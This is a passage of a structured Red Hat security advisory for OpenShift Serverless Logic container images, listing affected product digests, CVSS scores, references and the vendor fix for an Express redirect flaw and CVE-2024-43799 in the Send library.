"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", 